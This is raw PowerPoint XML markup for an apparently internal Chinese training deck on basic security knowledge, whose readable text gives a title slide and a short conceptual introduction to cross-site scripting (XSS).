        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7648464" y="2546444"/>
            <a:ext cx="1755743" cy="5665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446" tIns="18223" rIns="36446" bIns="1822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72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2" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7648462" y="3112997"/>
            <a:ext cx="1755743" cy="5665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446" tIns="18223" rIns="36446" bIns="1822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72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3599277" y="3355028"/>
            <a:ext cx="4049183" cy="1044630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="378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143" y="372439"/>
            <a:ext cx="9937789" cy="683589"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="86411" tIns="43205" rIns="86411" bIns="43205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42892" y="2513832"/>
            <a:ext cx="6059296" cy="2075017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="86411" tIns="43205" rIns="86411" bIns="43205" anchor="ctr" anchorCtr="0"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2300"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="507365" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="864235" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1296035" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1728470" indent="0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92143" y="6102164"/>
            <a:ext cx="2592467" cy="345009"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="86411" tIns="43205" rIns="86411" bIns="43205"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E528DE8F-8DB5-4710-82E5-6DACE62778C2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4B83-115B-4054-AC02-DC44F3D2F9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59" y="1060529"/>
            <a:ext cx="8641556" cy="2256061"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="567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59" y="3403592"/>
            <a:ext cx="8641556" cy="1564542"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2270"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="431800" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="189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10"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1727835" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1510"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2160270" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1510"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2592070" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1510"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3023870" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1510"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3456305" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="151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92143" y="6006162"/>
            <a:ext cx="2592467" cy="345009"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{90BF46F0-5A0F-4CCE-B27C-DFBB0E4632F3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52213-C790-43F3-A58B-B23F8B9427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7847993" y="6119124"/>
            <a:ext cx="3648075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0" y="6134100"/>
            <a:ext cx="2687638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6DB48-66CF-4125-AC31-F2A5FFDC8D1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469" y="5688359"/>
            <a:ext cx="1297013" cy="3969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1028065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5445" indent="-385445" algn="l" defTabSz="10280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5660" indent="-321310" algn="l" defTabSz="10280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defTabSz="10280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defTabSz="10280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defTabSz="1028065" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef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0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0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56990" indent="-257175" algn="l" defTabSz="10280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71340" indent="-257175" algn="l" defTabSz="10280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165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tags" Target="../tags/tag34.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11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tags" Target="../tags/tag33.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag37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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag26.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag36.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag31.xml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tags" Target="../tags/tag3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image" Target="../media/image39.png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notesSlide" Target="../notesSlides/notesSlide12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42.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag47.xml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5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5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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag62.xml"/><Relationship Id="rId9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tags" Target="../tags/tag80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tags" Target="../tags/tag79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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag72.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide21.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag77.xml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8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5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6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9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65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0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113.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66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9.xml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notesSlide" Target="../notesSlides/notesSlide37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24.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag129.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag123.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12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3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tags" Target="../tags/tag146.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag151.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag136.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide39.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag140.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag145.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag150.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag135.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag149.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout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tags" Target="../tags/tag144.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag138.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag148.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag143.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag152.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag137.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag142.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14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5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6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48469" y="1439887"/>
            <a:ext cx="7992745" cy="834390"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安全基础知识分享</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="4800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720477" y="2808039"/>
            <a:ext cx="5759450" cy="288290"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>刘彩君</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>促销与运营工具测试组</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean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C3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>简介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409190" y="1931035"/>
            <a:ext cx="680085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对角圆角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669290" y="1262380"/>
            <a:ext cx="8894445" cy="4424680"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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跨站脚本攻击，Cross Site Script，缩写是CSS，为了区别层叠样式表（Cascading Style Sheet, CSS）所以在安全领域叫“XSS”。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XSS攻击，通常指黑客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通过“HTML注入”篡改了网页，插入了恶意的脚本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，从而在用户浏览网页时，控制用户浏览器的一种攻击。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一开始这种攻击的演示案例是跨域的，所以叫做“跨站脚本”。但是发展到今天，由于JavaScript的强大功能以及网站前端应用的复杂化，是否跨域已经不再重要。由于历史原因，XSS这个名字一直保留下来。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29865" y="1764030"/>
            <a:ext cx="19881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C3300"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>简介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405" y="1376680"/>
            <a:ext cx="1268730" cy="1043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532" y="-5785"/>
            <a:ext cx="11518986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90">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Freeform 104"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="775850" y="1790859"/>
            <a:ext cx="2743676" cy="953871"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 618 w 620"/>
              <a:gd name="T1" fmla="*/ 72 h 185"/>
              <a:gd name="T2" fmla="*/ 587 w 620"/>
              <a:gd name="T3" fmla="*/ 35 h 185"/>
              <a:gd name="T4" fmla="*/ 565 w 620"/>
              <a:gd name="T5" fmla="*/ 18 h 185"/>
              <a:gd name="T6" fmla="*/ 598 w 620"/>
              <a:gd name="T7" fmla="*/ 95 h 185"/>
              <a:gd name="T8" fmla="*/ 560 w 620"/>
              <a:gd name="T9" fmla="*/ 152 h 185"/>
              <a:gd name="T10" fmla="*/ 492 w 620"/>
              <a:gd name="T11" fmla="*/ 168 h 185"/>
              <a:gd name="T12" fmla="*/ 338 w 620"/>
              <a:gd name="T13" fmla="*/ 168 h 185"/>
              <a:gd name="T14" fmla="*/ 144 w 620"/>
              <a:gd name="T15" fmla="*/ 164 h 185"/>
              <a:gd name="T16" fmla="*/ 37 w 620"/>
              <a:gd name="T17" fmla="*/ 170 h 185"/>
              <a:gd name="T18" fmla="*/ 279 w 620"/>
              <a:gd name="T19" fmla="*/ 168 h 185"/>
              <a:gd name="T20" fmla="*/ 413 w 620"/>
              <a:gd name="T21" fmla="*/ 171 h 185"/>
              <a:gd name="T22" fmla="*/ 516 w 620"/>
              <a:gd name="T23" fmla="*/ 171 h 185"/>
              <a:gd name="T24" fmla="*/ 543 w 620"/>
              <a:gd name="T25" fmla="*/ 170 h 185"/>
              <a:gd name="T26" fmla="*/ 549 w 620"/>
              <a:gd name="T27" fmla="*/ 170 h 185"/>
              <a:gd name="T28" fmla="*/ 408 w 620"/>
              <a:gd name="T29" fmla="*/ 178 h 185"/>
              <a:gd name="T30" fmla="*/ 267 w 620"/>
              <a:gd name="T31" fmla="*/ 182 h 185"/>
              <a:gd name="T32" fmla="*/ 132 w 620"/>
              <a:gd name="T33" fmla="*/ 179 h 185"/>
              <a:gd name="T34" fmla="*/ 13 w 620"/>
              <a:gd name="T35" fmla="*/ 181 h 185"/>
              <a:gd name="T36" fmla="*/ 2 w 620"/>
              <a:gd name="T37" fmla="*/ 177 h 185"/>
              <a:gd name="T38" fmla="*/ 9 w 620"/>
              <a:gd name="T39" fmla="*/ 159 h 185"/>
              <a:gd name="T40" fmla="*/ 66 w 620"/>
              <a:gd name="T41" fmla="*/ 102 h 185"/>
              <a:gd name="T42" fmla="*/ 48 w 620"/>
              <a:gd name="T43" fmla="*/ 60 h 185"/>
              <a:gd name="T44" fmla="*/ 56 w 620"/>
              <a:gd name="T45" fmla="*/ 17 h 185"/>
              <a:gd name="T46" fmla="*/ 194 w 620"/>
              <a:gd name="T47" fmla="*/ 14 h 185"/>
              <a:gd name="T48" fmla="*/ 282 w 620"/>
              <a:gd name="T49" fmla="*/ 7 h 185"/>
              <a:gd name="T50" fmla="*/ 429 w 620"/>
              <a:gd name="T51" fmla="*/ 9 h 185"/>
              <a:gd name="T52" fmla="*/ 536 w 620"/>
              <a:gd name="T53" fmla="*/ 3 h 185"/>
              <a:gd name="T54" fmla="*/ 494 w 620"/>
              <a:gd name="T55" fmla="*/ 2 h 185"/>
              <a:gd name="T56" fmla="*/ 330 w 620"/>
              <a:gd name="T57" fmla="*/ 5 h 185"/>
              <a:gd name="T58" fmla="*/ 217 w 620"/>
              <a:gd name="T59" fmla="*/ 9 h 185"/>
              <a:gd name="T60" fmla="*/ 78 w 620"/>
              <a:gd name="T61" fmla="*/ 10 h 185"/>
              <a:gd name="T62" fmla="*/ 26 w 620"/>
              <a:gd name="T63" fmla="*/ 21 h 185"/>
              <a:gd name="T64" fmla="*/ 23 w 620"/>
              <a:gd name="T65" fmla="*/ 20 h 185"/>
              <a:gd name="T66" fmla="*/ 19 w 620"/>
              <a:gd name="T67" fmla="*/ 32 h 185"/>
              <a:gd name="T68" fmla="*/ 27 w 620"/>
              <a:gd name="T69" fmla="*/ 51 h 185"/>
              <a:gd name="T70" fmla="*/ 56 w 620"/>
              <a:gd name="T71" fmla="*/ 100 h 185"/>
              <a:gd name="T72" fmla="*/ 11 w 620"/>
              <a:gd name="T73" fmla="*/ 153 h 185"/>
              <a:gd name="T74" fmla="*/ 0 w 620"/>
              <a:gd name="T75" fmla="*/ 173 h 185"/>
              <a:gd name="T76" fmla="*/ 0 w 620"/>
              <a:gd name="T77" fmla="*/ 185 h 185"/>
              <a:gd name="T78" fmla="*/ 7 w 620"/>
              <a:gd name="T79" fmla="*/ 182 h 185"/>
              <a:gd name="T80" fmla="*/ 97 w 620"/>
              <a:gd name="T81" fmla="*/ 181 h 185"/>
              <a:gd name="T82" fmla="*/ 231 w 620"/>
              <a:gd name="T83" fmla="*/ 185 h 185"/>
              <a:gd name="T84" fmla="*/ 370 w 620"/>
              <a:gd name="T85" fmla="*/ 184 h 185"/>
              <a:gd name="T86" fmla="*/ 549 w 620"/>
              <a:gd name="T87" fmla="*/ 181 h 185"/>
              <a:gd name="T88" fmla="*/ 557 w 620"/>
              <a:gd name="T89" fmla="*/ 171 h 185"/>
              <a:gd name="T90" fmla="*/ 611 w 620"/>
              <a:gd name="T91" fmla="*/ 94 h 185"/>
              <a:gd name="T92" fmla="*/ 620 w 620"/>
              <a:gd name="T93" fmla="*/ 82 h 185"/>
              <a:gd name="T94" fmla="*/ 44 w 620"/>
              <a:gd name="T95" fmla="*/ 76 h 185"/>
              <a:gd name="T96" fmla="*/ 26 w 620"/>
              <a:gd name="T97" fmla="*/ 35 h 185"/>
              <a:gd name="T98" fmla="*/ 24 w 620"/>
              <a:gd name="T99" fmla="*/ 24 h 185"/>
              <a:gd name="T100" fmla="*/ 60 w 620"/>
              <a:gd name="T101" fmla="*/ 94 h 185"/>
              <a:gd name="T102" fmla="*/ 59 w 620"/>
              <a:gd name="T103" fmla="*/ 105 h 185"/>
              <a:gd name="T104" fmla="*/ 602 w 620"/>
              <a:gd name="T105" fmla="*/ 102 h 185"/>
              <a:gd name="T106" fmla="*/ 552 w 620"/>
              <a:gd name="T107" fmla="*/ 173 h 185"/>
              <a:gd name="T108" fmla="*/ 558 w 620"/>
              <a:gd name="T109" fmla="*/ 164 h 185"/>
              <a:gd name="T110" fmla="*/ 553 w 620"/>
              <a:gd name="T111" fmla="*/ 163 h 185"/>
              <a:gd name="T112" fmla="*/ 553 w 620"/>
              <a:gd name="T113" fmla="*/ 163 h 185"/>
              <a:gd name="T114" fmla="*/ 607 w 620"/>
              <a:gd name="T115" fmla="*/ 89 h 185"/>
              <a:gd name="T116" fmla="*/ 616 w 620"/>
              <a:gd name="T117" fmla="*/ 83 h 185"/>
              <a:gd name="T118" fmla="*/ 602 w 620"/>
              <a:gd name="T119" fmla="*/ 102 h 18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620" h="185">
                <a:moveTo>
                  <a:pt x="620" y="80"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="620" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="569" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="565" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="598" y="95"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574" y="128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="565" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="560" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="501" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="543" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="301" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="491" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="10"/>
